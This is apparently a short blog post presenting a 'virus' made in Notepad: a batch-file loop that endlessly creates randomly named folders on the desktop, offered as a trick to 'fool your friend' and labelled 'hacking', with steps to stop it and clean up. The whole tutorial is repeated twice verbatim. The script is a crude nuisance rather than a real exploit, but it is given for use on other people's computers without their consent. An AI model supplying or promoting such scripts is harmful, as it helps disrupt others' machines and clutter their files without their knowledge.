Hi TTH readers, today I am going to make a virus in notepad that floods your PC desktop with unlimited number of folders.
You can use this trick to fool you friend.
Follow these steps:
1. Open Notepad and copy paste the following code in it.
@echo off
:l
md %random%
goto l
2. Save it on desktop with "flood.bat" or "anything.bat".
3. Double click on this batch file to see its effect.
NOTE: Dont apply on your own PC.
Accidentally, if you have double clicked then no need to worry.
From Task Manager, terminate this program and delete the created folder from the desktop.
One way to delete is, press ctrl + a.
Deselect all your required icons and press Delete.
Enjoy Hacking.
Join, if you liked the post.
You can use this trick to fool you friend.
Follow these steps:
1. Open Notepad and copy paste the following code in it.
@echo off
:l
md %random%
goto l
2. Save it on desktop with "flood.bat" or "anything.bat".
3. Double click on this batch file to see its effect.
NOTE: Dont apply on your own PC.
Accidentally, if you have double clicked then no need to worry.
From Task Manager, terminate this program and delete the created folder from the desktop.
One way to delete is, press ctrl + a.
Deselect all your required icons and press Delete.
Enjoy Hacking.
Join, if you liked the post.
No comments:
Post a Comment
We appreciate your valuable comments.